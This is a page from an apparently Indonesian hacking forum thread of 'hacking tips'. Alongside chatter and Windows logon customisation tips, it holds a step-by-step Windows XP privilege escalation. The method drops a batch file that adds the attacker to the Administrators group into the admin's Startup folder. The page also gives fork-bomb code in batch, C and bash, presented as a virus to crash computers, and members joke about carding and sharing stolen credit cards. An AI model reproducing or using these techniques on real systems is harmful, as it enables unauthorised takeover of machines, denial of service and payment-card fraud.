--= Myth The Night =--
Login Dulu sebelum Baca

--= Myth The Night =--

Cyber Team
 
HomePortalCalendarGalleryFAQSearchMemberlistUsergroupsRegisterLog in
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Hack Damage
Thu May 31, 2012 1:00 pm by Cheese_Zar

» Cara Percepat Koneksi Internet Speedy,Dial Up tanpa software
Thu Jan 19, 2012 3:20 pm by zky.spy.46

» Cara ngunci folder tanpa software...
Thu Jan 19, 2012 12:54 pm by zky.spy.46

» Icon/maskot MCT
Fri May 27, 2011 4:46 pm by Ace Phantom

» Salam Hangat Dari Seorang Newbie
Sun May 15, 2011 5:27 pm by OeLaDZz

» Yg Ngerti HP Motorola !!! (bantuin)
Fri Mar 11, 2011 11:38 am by jonimarkuntil

» Pendapat Anda !!
Sun Jan 16, 2011 10:55 am by OeLaDZz

» talking-talking pake bahasa asing
Fri Jan 14, 2011 1:10 am by 5uV1m_21V

» LOGO Matauli Cyber Team
Thu Jan 13, 2011 9:37 pm by necros

Navigation
 Portal
 Indeks
 Anggota
 Profil
 FAQ
 Pencarian
Forum

Share | 
 

 Tips & Trik Hacking...

View previous topic View next topic Go down 
Go to page : Previous  1, 2, 3, 4, 5, 6  Next
AuthorMessage
zee_00n
Global Moderator
Global Moderator
avatar

Jumlah posting : 498
Join date : 2009-11-15
Age : 24
Lokasi : Antara NeRaka dan SurGa

PostSubject: Re: Tips & Trik Hacking...   Mon Nov 23, 2009 3:56 pm

KAGAK ada uang beibeh

lu kan carder
wkakakak

bagi CC duonk

xaxaxaxax
Back to top Go down
View user profile http://forum1.mtn-cyber.net
zee_00n
Global Moderator
Global Moderator
avatar

Jumlah posting : 498
Join date : 2009-11-15
Age : 24
Lokasi : Antara NeRaka dan SurGa

PostSubject: Re: Tips & Trik Hacking...   Mon Nov 23, 2009 3:57 pm

thax kk

Smile Smile Smile
Back to top Go down
View user profile http://forum1.mtn-cyber.net
zee_00n
Global Moderator
Global Moderator
avatar

Jumlah posting : 498
Join date : 2009-11-15
Age : 24
Lokasi : Antara NeRaka dan SurGa

PostSubject: Re: Tips & Trik Hacking...   Mon Nov 23, 2009 4:01 pm

@all
laen kali liat2 Tempat..

Razz Razz Razz
Back to top Go down
View user profile http://forum1.mtn-cyber.net
Xtwelve
Wanna Be Hacker
Wanna Be Hacker
avatar

Jumlah posting : 200
Join date : 2009-11-12
Age : 27
Lokasi : Jabodetabek

PostSubject: Re: Tips & Trik Hacking...   Mon Nov 23, 2009 4:40 pm

Dkmr gw nmpuk nie CC yg kgak tepake..

xixixixixixixixi
Back to top Go down
View user profile
zee_00n
Global Moderator
Global Moderator
avatar

Jumlah posting : 498
Join date : 2009-11-15
Age : 24
Lokasi : Antara NeRaka dan SurGa

PostSubject: Re: Tips & Trik Hacking...   Mon Nov 23, 2009 5:30 pm

bagi bagi..

Very Happy
Back to top Go down
View user profile http://forum1.mtn-cyber.net
zee_00n
Global Moderator
Global Moderator
avatar

Jumlah posting : 498
Join date : 2009-11-15
Age : 24
Lokasi : Antara NeRaka dan SurGa

PostSubject: MENDAPATKAN AKSES ADMIN WINDOWS XP   Mon Nov 23, 2009 5:33 pm

//---< Metode exploitasi:

Windows XP yang file systemnya adalah Fat32 memperbolehkan user biasa untuk mengakses direktory home dari admin yang (biasanya) terletak pada lokasi berikut:

C:\Documents and Settings\Administrator\

Sedangkan pada Windows XP yang ber file system NTFS, user biasa tidak akan bisa mengakses direktory home dari admin.

//---< Exploitasi

1. MELIHAT USER TERDAFTAR
------------------------------
C:\DOCUME~1\spyro>net user

User accounts for \\spyroNET
------------------------------------------------------------------------------
Administrator Guest spyro
HelpAssistant SUPPORT_388945a0 SuperUser
The command completed successfully.


MELIHAT HAK AKSES USER
----------------------------------------------

C:\DOCUME~1\spyro>net user SuperUser
User name SuperUser
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 7/12/2004 3:38 AM
Password expires Never
Password changeable 7/12/2004 3:38 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/12/2004 11:16 PM

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.

Kini kita sudah tau siapa yang menjadi Administrator. Buatlah script batch seperti berikut:

net localgoup Administrators spyro /add

Simpan di lokasi berikut:
C:\Documents and Settings\SuperUser\Start Menu\Programs\Startup

Tunggu sang admin untuk login... setelah itu, level kita sudah setingkat admin Wink
Back to top Go down
View user profile http://forum1.mtn-cyber.net
zee_00n
Global Moderator
Global Moderator
avatar

Jumlah posting : 498
Join date : 2009-11-15
Age : 24
Lokasi : Antara NeRaka dan SurGa

PostSubject: Menyembunyikan Data Rahasia Didalam "Recycle Bin"   Mon Nov 23, 2009 6:40 pm

---( LANGKAH 1 )
Buatlah sebuah directory baru. Beri nama yang sekiranya mirip dengan Recycle Bin (social engineering ^_^). Dalam contoh ini saya membuat sebuah directory dengan nama RECYCLE. Directory inilah yang nantinya akan kita pergunakan untuk menyembunyikan data-data Rahasia kita.


Setelah itu, masukkan data-data yang ingin anda sembunyikan didalamnya.

---( LANGKAH 2 )
Salin dan modifikasi script berikut ini kedalam Text Editor kesayangan anda:
[You must be registered and logged in to see this image.]

Yang perlu anda edit adalah lokasi directory RECYCLE pada baris:

set DirName=E:\RECYCLE

Sesuaikan E:\RECYCLE dengan lokasi directory RECYCLE yang anda ciptakan. Ingat, jangan tambahkan tanda '\' pada script tersebut dibelakang nama directory yang anda ciptakan. Jika sudah, simpan script tersebut dengan nama RECYCLE.bat


---( LANGKAH 3 )
Klik ganda file RECYCLE.bat lalu tekan sembarang tombol.


Viola.. kini Directory anda sudah lenyap dari hadapan mata akibat dari perintah Attrib. Tapi bukan itu inti persembunyian kita.. ^_^ Pembahasan kita khan menyembunyikan data dalam Recycle Bin ^_^

Well.. sekarang, klik Tools --> Folder Options lalu klik tab View. Pilih "Show hidden files and Folders" dan hilangkan centang pada "Hide protected operating system files.."


Semua file dan directory beratribut hidden dan System akan tampil. Coba anda lihat apa yang terjadi dengan directory Rahasia anda... hehehe.. kini directory tersebut telah berubah menjadi Recycle Bin. Bahkan keterangan yang ada pada Status Bar juga memberikan 'kesaksian' (halah.. kayak kasus pembunuhan ajah.. ^_^) pada user bahwa directory tersebut adalah Recycle Bin. Baca apa yang dikatakan oleh Status Bar.. "Contains the files and folders that you have deleted"



---( LANGKAH 4 )
Coba anda buka directory tersebut, isinya tidak lain adalah Recycle Bin anda. Data-data rahasia anda tadi tersembunyi dengan rapi didalamnya dan sama sekali tidak terlihat. Cobalah anda menghapus suatu file dan mengirimnya ke Recycle Bin, maka file yang anda hapus tersebut juga akan tampil di directory RECYCLE anda. Hohoho.. sama persis seperti Recycle Bin. Bahkan ketika anda melakukan klik kanan, Context menu yang tampil pun sama persis seperti ketika anda melakukan klik kanan pada Recycle Bin.



---( LANGKAH 5 )
Lha, trus gimana cara mengakses data-data tersebut?? Salin dan edit script berikut ini kedalam text editor anda:


Bagian yang anda edit sama seperti script pertama tadi, sesuaikan E:\RECYCLE dengan lokasi directory RECYCLE yang anda ciptakan. Dan.. sekali lagi ingat, jangan tambahkan tanda '\' pada script tersebut dibelakang nama directory yang anda ciptakan. Jika sudah, simpan script tersebut dengan nama UNRECYCLE.bat



---( LANGKAH 6 )
Klik ganda file UNRECYCLE.bat tekan sembarang tombol sesudahnya.

Kemudian lihatlah directory RECYCLE anda. Icon directory anda yang tadinya mirip Recycle Bin kembali menjadi Icon directory biasa. Bukalah directory tersebut, kini seluruh data yang tadi tersembunyi dapat anda lihat



/* ------------------------------|EOF|------------------------------ */

..:zee_00n:..
Back to top Go down
View user profile http://forum1.mtn-cyber.net
thOr
Newbie
Newbie
avatar

Jumlah posting : 21
Join date : 2009-11-23
Lokasi : nggak ke mana-mana

PostSubject: code jahat   Mon Nov 23, 2009 9:01 pm

Sodara2 sebangsa dan setanah air,perkenankanlah saya mengepostkan thread pertama saya....
Dan dikarenakan saya masih newbie jadi harap maklum saja yah...heheheh

1.buka notepad terus ketikkan

Code:
%0|%0

2.lalu save sebagai format .bat
3.jadilah virus junker

Dengan double klik maka itu akan membuat lebih dari 500+ proses dari cmd sehingga membuat computer hang atau error.
Virus ini dinamakan fork bomb.
Ini adalah versi C++ dari fork bomb

Code:
#include
int main(void)
{
while(1)
fork();
return 0;
}

dan versi shell (Unix/bash)

:(){ :|:& };:



rabbit
Back to top Go down
View user profile
zee_00n
Global Moderator
Global Moderator
avatar

Jumlah posting : 498
Join date : 2009-11-15
Age : 24
Lokasi : Antara NeRaka dan SurGa

PostSubject: Re: Tips & Trik Hacking...   Mon Nov 23, 2009 10:11 pm

wah thread 0ke neh..
Unix bwat kluarga linux bukan??
Back to top Go down
View user profile http://forum1.mtn-cyber.net
OeLaDZz
Senior Member
Senior Member
avatar

Jumlah posting : 279
Join date : 2009-11-08
Age : 24
Lokasi : asrama mTn.............

PostSubject: Re: Tips & Trik Hacking...   Tue Nov 24, 2009 7:02 am

Thumbs up..
Hebat,anak mct bisa bkin virus...
Dikembangin yah....
Keep share..
Back to top Go down
View user profile http://www.cirt.org.uk/forum/messages.asp?iMsg=347&amp;iFor=
z3r0x
Global Moderator
Global Moderator
avatar

Jumlah posting : 220
Join date : 2009-11-20
Age : 27
Lokasi : Cyber World

PostSubject: Re: Tips & Trik Hacking...   Tue Nov 24, 2009 1:18 pm

lain kali klw mw ngepost code pake format code...
Code:
[code]isi code atw script[/code]

agar tidak beruubah menjadi smile...
Back to top Go down
View user profile
z3r0x
Global Moderator
Global Moderator
avatar

Jumlah posting : 220
Join date : 2009-11-20
Age : 27
Lokasi : Cyber World

PostSubject: Re: Tips & Trik Hacking...   Tue Nov 24, 2009 1:24 pm

topic ini tidak bsa di replay sampai di pindahkan

mhon do baca kembali rules yg telah di buat...
/-----------TOPIC LOCKED-----------\

Back to top Go down
View user profile
z3r0x
Global Moderator
Global Moderator
avatar

Jumlah posting : 220
Join date : 2009-11-20
Age : 27
Lokasi : Cyber World

PostSubject: Re: Tips & Trik Hacking...   Tue Nov 24, 2009 1:25 pm

lol!
Back to top Go down
View user profile
z3r0x
Global Moderator
Global Moderator
avatar

Jumlah posting : 220
Join date : 2009-11-20
Age : 27
Lokasi : Cyber World

PostSubject: Re: Tips & Trik Hacking...   Tue Nov 24, 2009 8:03 pm

nyoba dolo ah.... What a Face
Back to top Go down
View user profile
viiking
Newbie
Newbie
avatar

Jumlah posting : 14
Join date : 2009-11-24
Lokasi : xyber dexstop

PostSubject: KRITIK!!!BACA DAH!!   Tue Nov 24, 2009 8:15 pm

ne cman kritik dari seorang newbie...
klw mw di hiraukan silakan...
gw cman mw ngritik para TS disini...

kok threadnya banyak amat??
mnurut gw ne malah bwt orang susah bolak2 buka thread...trus bnyak2in tab..
klw saran dari gw seh..
mending gini..

tips&trik tntang hacking di kumpul dalam 1 thread...
misalnya thread yg kalian buat tntang,,
Menyembunyikan Data Rahasia Didalam "Recycle Bin"
Mempercepat browser mozilla,,,
Membuat File Super Hidden
FOLDER DIVERT.EXE

sebenarnya bsa di buat dalam 1 thread yg berisi tips & trik...krna tu smua kan cman trik aja..


trus thead2 klian di subboard deface
The New Dork
Nambahin Dork^^

sbnarnya bsa di buat dalam 1 thread yg brisi kumpulan dork,,,
karna tu masih seputar dork...
klw di buat dalam thread yg berbeda member capek bolak-balik..

mohon kebijakannya...

klw mw maju ne forum perhatiin saran gw...
klw mw maju blajar dari forum besar... study study
Back to top Go down
View user profile
necros
Senior Member
Senior Member
avatar

Jumlah posting : 268
Join date : 2009-11-21
Age : 24
Lokasi : dunia game nan jauh di mato

PostSubject: Re: Tips & Trik Hacking...   Tue Nov 24, 2009 8:33 pm

nice ide gan....
Back to top Go down
View user profile http://www.necr0s.blogspot.com
Xtwelve
Wanna Be Hacker
Wanna Be Hacker
avatar

Jumlah posting : 200
Join date : 2009-11-12
Age : 27
Lokasi : Jabodetabek

PostSubject: Re: Tips & Trik Hacking...   Tue Nov 24, 2009 9:38 pm

Pas bgt tuh,,
Back to top Go down
View user profile
OeLaDZz
Senior Member
Senior Member
avatar

Jumlah posting : 279
Join date : 2009-11-08
Age : 24
Lokasi : asrama mTn.............

PostSubject: Re: Tips & Trik Hacking...   Wed Nov 25, 2009 7:19 am

Gua dukung...
Back to top Go down
View user profile http://www.cirt.org.uk/forum/messages.asp?iMsg=347&amp;iFor=
zee_00n
Global Moderator
Global Moderator
avatar

Jumlah posting : 498
Join date : 2009-11-15
Age : 24
Lokasi : Antara NeRaka dan SurGa

PostSubject: Re: Tips & Trik Hacking...   Wed Nov 25, 2009 8:54 am

Kita tunggu si admin
kyagna stuju dia..
Thax ea..
Saranya viking
Back to top Go down
View user profile http://forum1.mtn-cyber.net
zee_00n
Global Moderator
Global Moderator
avatar

Jumlah posting : 498
Join date : 2009-11-15
Age : 24
Lokasi : Antara NeRaka dan SurGa

PostSubject: Re: Tips & Trik Hacking...   Wed Nov 25, 2009 9:01 am

Silahkan kk..
:p
Back to top Go down
View user profile http://forum1.mtn-cyber.net
viiking
Newbie
Newbie
avatar

Jumlah posting : 14
Join date : 2009-11-24
Lokasi : xyber dexstop

PostSubject: Re: Tips & Trik Hacking...   Wed Nov 25, 2009 3:52 pm

@Xtwelve & OeLaDZz
klian brdua ngedukung tapi gw rasa malah klian dua yg gw kecam!
bkannya klian berdua yg ngepost thread2 tu??? scratch
Back to top Go down
View user profile
OeLaDZz
Senior Member
Senior Member
avatar

Jumlah posting : 279
Join date : 2009-11-08
Age : 24
Lokasi : asrama mTn.............

PostSubject: memoles tampilan windows pad saat log on   Wed Nov 25, 2009 4:04 pm

maaf, kayaknya ne artikel salah room kali ya???? soalnya aku gga tau mau letak dimana. room tips and trik blum ada....
hiks....Sad'
dimulai ajja la ya......

Artikel ini mungkin sudah banyak yang udah pada tau, dan bahkan sudah usang
bagi para master di MCT. Semoga bermanfaat buat yang belom tau.
Langsung aja,, tanpa basa dan basi,,, sebelum anda melakukan langkah di bawah ini ada baiknya terlebih dahulu mem-backup registry Windows anda agar lebih aman.

Caranya : start-run-regedit-Enter, Di dalam Registry Editor, pilih menu File-Export-masukkan nama file ke bagian File Name-Save.


Hal ini bertujuan jika terjadi kesalahan yang membuat sistem Windows anda tidak normal lagi, maka pergilah ke Windows Explorer dan bukalah file backup dari regedit tadi dan doble klik file tersebut.
Hal ini juga bisa dilakukan untuk meminimalisir serangan virus pada registry, dengan ketentuan pada
saat menbackup registry, registry belum terserang virus atau dengan kata lain Windows masih dalam
keadaan default.
Nah,,, langsung pada intinya,,, berikut beberapa tips untuk memoles Windows XP pada saat logon (agar beda gitu ama kompi-kompi orang, lebih keren aja n’ beda dari yang lain).

1. Membuat Tampilan Berbeda Pada Jendela Logon
HKEY_USERS/.DEFAULT/Software/Microsoft/Windows/CurrentVersion/ThemeManager
Klik ganda ColorName dan masukkan teks Metallic pada Value Data.

2. Menampilkan Administrator Di Welcome Screen
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Buat sebuah DWORD Value baru dan beri nama Administrator.
Klik ganda Administrator dan masukkan angka 1 pada Value Data.

3. Mengubah Jendela Logon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Buat sebuah DWORD Value baru dan beri nama LogonType.
Klik ganda LogonType dan masukkan value sebagai berikut pada Value Data:
0 > Classic Mode
1 > Welcome Screen

4. Mengubah Wallpaper Di Jendela Logon
HKEY_USERS\.DEFAULT\Control Panel\Desktop
Ubah nilai key Wallpaper dan masukkan path tempat lokasi file bitmap (.bmp)
yang diinginkan. (contoh: D:/Documents/Wallpaper.bmp)
Mengubah Wallpaper Di Jendela Logon
HKEY_USERS\.DEFAULT\Control Panel\Desktop
Ubah nilai key Wallpaper dan masukkan path tempat lokasi file bitmap (.bmp)
yang diinginkan. (contoh: D:/Documents/Wallpaper.bmp)

5. Kotak Dialog Sebelum Logon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Klik ganda LegalNoticeCaption dan masukkan input teks judul yang diinginkan
(contoh: WARNING). Klik ganda LegalNoticeText dan masukkan input teks yang
diinginkan (contoh: Do Not Attempt to Logon to this system unless you are an authorized user).

6. Kustomisasi Windows Logon Dan Judul Dialog Keamanan
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Buat sebuah String Value baru dan beri nama Welcome.
Klik ganda Welcome dan masukkan input teks yang diinginkan.


7. Menyembunyikan Usernames Dari Jendela Logon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Buat sebuah DWORD Value baru dan beri nama sesuai dengan username yang diinginkan.
Klik ganda pada value tersebut dan masukkan angka 0 pada Value Data.

Itu ajja dah, kalo ada yang mau menambahi silakan…..
di tunggu……


………../OeLaDZz…………….


©️ copyright 2009 by OeLaDZz member of MCT Blue Hat Company
Basketball Sad
Back to top Go down
View user profile http://www.cirt.org.uk/forum/messages.asp?iMsg=347&amp;iFor=
z3r0x
Global Moderator
Global Moderator
avatar

Jumlah posting : 220
Join date : 2009-11-20
Age : 27
Lokasi : Cyber World

PostSubject: Re: Tips & Trik Hacking...   Wed Nov 25, 2009 5:34 pm

argh....
ne lagi...
buat capek mod aja...
Back to top Go down
View user profile
OeLaDZz
Senior Member
Senior Member
avatar

Jumlah posting : 279
Join date : 2009-11-08
Age : 24
Lokasi : asrama mTn.............

PostSubject: Re: Tips & Trik Hacking...   Wed Nov 25, 2009 5:44 pm

weeeeeeeeeeewwwwwwwwww

gga ada room tips and trik..

jadi ditaruh dimana??????????


@admin
tolong kebijaksanaanya
Back to top Go down
View user profile http://www.cirt.org.uk/forum/messages.asp?iMsg=347&amp;iFor=
OeLaDZz
Senior Member
Senior Member
avatar

Jumlah posting : 279
Join date : 2009-11-08
Age : 24
Lokasi : asrama mTn.............

PostSubject: Re: Tips & Trik Hacking...   Wed Nov 25, 2009 5:47 pm

maaf dahhhhhhhhhhhhhhhhhhhhh..................
Laughing Laughing Laughing
Back to top Go down
View user profile http://www.cirt.org.uk/forum/messages.asp?iMsg=347&amp;iFor=
Sponsored content




PostSubject: Re: Tips & Trik Hacking...   

Back to top Go down
 
Tips & Trik Hacking...
View previous topic View next topic Back to top 
Page 3 of 6Go to page : Previous  1, 2, 3, 4, 5, 6  Next

Permissions in this forum:You cannot reply to topics in this forum
--= Myth The Night =-- :: HACKING-
Jump to: